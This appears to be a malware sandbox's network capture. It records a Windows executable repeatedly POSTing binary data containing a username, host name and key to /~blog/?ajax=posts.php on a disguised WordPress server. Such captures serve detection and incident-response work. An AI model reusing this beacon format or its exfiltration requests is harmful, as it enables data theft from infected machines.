                                            Apr 26, 2024 04:43:17.303853035 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                            Apr 26, 2024 04:43:17.303936958 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                            Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                            Apr 26, 2024 04:43:17.303977966 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                            Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                            Apr 26, 2024 04:43:17.304017067 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                            Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            49192.168.2.44979245.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:17.632926941 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:17.821742058 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:18.720782995 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:17 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:18.721404076 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:18.729526997 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:18.729626894 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:18.729846954 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:18.729882956 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:18.730154037 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:18.730200052 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:18.730319977 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:18.730452061 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            50192.168.2.44979345.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:19.056807995 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:19.245510101 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:20.159336090 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:19 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:20.159399986 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:20.167474031 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:20.167912960 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:20.168005943 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:20.168045044 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:20.168190956 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:20.168232918 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:20.168271065 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:20.168311119 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            51192.168.2.44979445.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:20.496254921 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:20.684895039 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:21.587587118 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:20 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:21.587707043 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:21.587744951 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:21.595545053 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:21.595608950 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:21.595786095 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:21.595873117 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:21.596366882 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:21.596410036 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:21.596520901 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            52192.168.2.44979545.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:21.940706968 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:22.138323069 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:23.038809061 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:22 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:23.038935900 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:23.038957119 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:23.048779011 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:23.049536943 CEST166INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74
                                            Data Ascii: <title>Natural biz blog</title><link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:23.049578905 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                            Apr 26, 2024 04:43:23.049700022 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                            Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                            Apr 26, 2024 04:43:23.049736977 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                            Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                            Apr 26, 2024 04:43:23.049854040 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                            Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia
                                            Apr 26, 2024 04:43:23.051150084 CEST1289INData Raw: 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 61 6e 63
                                            Data Ascii: -block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{color:currentColor;fill:currentColor}.wp-block-social-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
